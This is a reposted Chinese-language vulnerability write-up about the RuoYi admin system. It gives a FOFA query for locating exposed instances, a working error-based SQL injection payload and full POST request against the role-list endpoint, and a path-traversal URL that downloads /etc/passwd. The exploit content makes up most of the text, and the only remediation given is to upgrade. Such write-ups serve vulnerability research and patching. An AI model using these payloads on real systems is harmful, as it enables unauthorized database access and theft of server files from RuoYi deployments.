若依(Ruoyi)管理系統后台sql注入+任意文件下載漏洞


0x00若依介紹

若依可以用於所有的Web應用程序,如網站管理后台,網站會員中心,CMS,CRM,OA。所有前端后台代碼封裝過后十分精簡易上手,出錯概率低。同時支持移動客戶端訪問。系統會陸續更新一些實用功能。
寓意:你若不離不棄,我必生死相依

0x01漏洞描述

若依管理系統是基於SpringBoot的權限管理系統,后台存在sql注入、任意文件下載漏洞,可以讀取數據庫、服務器上的任意文件內容。

0x02FOFA

app=”若依-管理系統”

0x03漏洞復現

SQL注入

這是個后台洞,所以需要進入到后台嚶嚶嚶

在這里插入圖片描述
漏洞位置在”系統管理”里中的”角色管理中”
http://xxxxxxx/system/role/list
在這里插入圖片描述

POC:
pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and
extractvalue(1,concat(0x7e,substring((select database()),1,32),0x7e))

POST /system/role/list HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: JSESSIONID=dea10cdb-9d3c-4f6a-854a-ea1ca540a992
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 195

pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))

成功利用報錯注入拿到數據數據庫名稱

在這里插入圖片描述

任意文件下載

影響版本:RuoYi < v4.5.1

在這里插入圖片描述

登錄后台后直接訪問以下url即可下載文件

http://xxx/common/download/resource?resource/profile/../../../../etc/passwd

在這里插入圖片描述

0x04漏洞修復

更新升級到最新版本

轉載請注明:Adminxe's Blog » 若依(Ruoyi)管理系統后台sql注入+任意文件下載漏洞


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM